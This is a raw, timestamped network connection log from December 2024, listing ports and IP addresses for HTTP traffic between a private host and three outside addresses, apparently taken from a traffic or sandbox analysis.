Dec 13, 2024 18:53:24.458734989 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.458780050 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.459851980 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.459892988 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.459908009 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.459949017 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.461019993 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.461060047 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.461199045 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.461239100 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.462215900 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.462260962 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.462289095 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.462327003 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.463552952 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.463593960 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.463718891 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.463757992 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.464761972 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.464802027 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.464883089 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.464921951 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.465941906 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.466023922 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.466051102 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.466089964 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.467036009 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.467087984 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.467114925 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.467156887 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.468174934 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.468219042 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.468255997 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.468295097 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.469378948 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.469420910 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.469510078 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.469551086 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.470601082 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.470644951 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.470705986 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.470756054 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.471937895 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.471986055 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.472069979 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.472110033 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.473191023 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.473237991 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.473268986 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.473311901 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.474179983 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.474234104 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.474262953 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.474304914 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.475440025 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.475502014 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.475507975 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.475548983 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.476522923 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.476571083 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.476632118 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.476676941 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.477734089 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.477780104 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.477861881 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.477904081 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.478943110 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.478987932 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.479054928 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.479099035 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.480370045 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.480413914 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.480443001 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.480485916 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.481463909 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.481512070 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.481561899 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.481604099 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.482517004 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.482557058 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.482615948 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.482657909 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.483721972 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.483767033 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.483838081 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.483879089 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.484899998 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.484946012 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.485009909 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.485050917 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.486107111 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.486171961 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.486251116 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.486294031 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.487309933 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.487354040 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.487410069 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.487449884 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.488528013 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.488574028 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.488650084 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.488691092 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.489670038 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.489713907 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.489772081 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.489810944 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.490885019 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.490930080 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.490986109 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.491025925 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.492067099 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.492115021 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.492189884 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.492259026 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.493266106 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.493308067 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.493359089 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.493401051 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.494448900 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.494492054 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.494564056 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.494607925 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.495702982 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.495748997 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.495842934 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.495882988 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.496808052 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.496849060 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.626769066 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.626873016 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.626914024 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.626965046 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.627269983 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.627320051 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.627532005 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.627574921 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.627609015 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.627650023 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.628745079 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.628801107 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.628833055 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.628878117 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.629889011 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.629935980 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.630017042 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.630063057 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.631129026 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.631179094 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.631227016 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.631268978 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.632353067 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.632396936 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.632425070 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.632468939 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.633538961 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.633584976 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.633713961 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.633755922 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.634743929 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.634787083 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.634788036 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.634828091 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.635973930 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.636037111 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.636049032 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.636087894 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.637052059 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.637092113 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.637268066 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.637306929 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.638267040 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.638308048 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.638371944 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.638412952 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.639566898 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.639620066 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.639720917 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.639766932 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.640741110 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.640789032 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.640824080 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.640862942 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.641915083 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.642038107 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.642065048 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.642077923 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.643167973 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.643214941 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.643297911 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.643342972 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.644413948 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.644462109 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.644610882 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.644654036 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.645584106 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.645631075 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.645855904 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.645900011 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.646711111 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.646761894 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.646846056 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.646889925 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.647842884 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.647912025 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.647934914 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.647975922 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.649010897 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.649055958 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.649122953 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.649167061 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.650249958 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.650291920 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.650360107 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.650403976 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.651434898 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.651485920 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.651521921 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.651565075 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.652564049 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.652611971 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.652642965 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.652721882 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.653937101 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.653991938 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.654094934 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.654136896 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.654926062 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.654968023 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.655054092 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.655091047 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.656164885 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.656245947 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.656281948 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.656322956 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.657347918 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.657387972 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.657439947 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.657480001 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.658577919 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.658617020 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.658703089 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.658742905 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.659775972 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.659835100 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.659944057 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.659986019 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.660932064 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.660974026 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.661079884 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.661119938 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.662103891 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.662151098 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.662192106 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.662233114 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.663320065 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.663367033 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.663438082 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.663477898 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.664541960 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.664581060 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.664613962 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.664658070 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.665676117 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.665723085 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.665755987 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.665797949 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.666868925 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.666910887 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.666968107 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.667006969 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.668059111 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.668098927 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.668168068 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.668209076 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.669262886 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.669305086 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.669358015 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.669400930 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.670500994 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.670542955 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.670572996 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.670613050 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.671653032 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.671694994 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.671814919 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.671858072 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.672874928 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.672914028 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.672998905 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.673037052 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:24.674027920 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:24.674069881 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:26.912070990 CET	49841	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:26.912448883 CET	49859	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:27.032871008 CET	80	49841	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:27.032895088 CET	80	49859	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:27.032953024 CET	49841	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:27.033000946 CET	49859	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:27.033195972 CET	49859	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:27.152872086 CET	80	49859	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:27.961174965 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:27.961229086 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:28.384562969 CET	80	49859	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:28.384671926 CET	49859	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:28.388725042 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:28.508589983 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:28.508678913 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:28.508913994 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:28.628882885 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.835027933 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.835098982 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:29.835170031 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.835182905 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.835222960 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:29.835417032 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.835438013 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.835452080 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.835463047 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:29.835464954 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.835494995 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:29.835494995 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:29.835527897 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:29.835951090 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.835963964 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.835975885 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.836003065 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:29.836035967 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:29.997560978 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.997643948 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:29.998197079 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.998238087 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:29.998245955 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:29.998276949 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.237668991 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.237781048 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.237951040 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.237979889 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.237997055 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.238003016 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.238014936 CET	80	49864	31.41.244.11	192.168.2.7
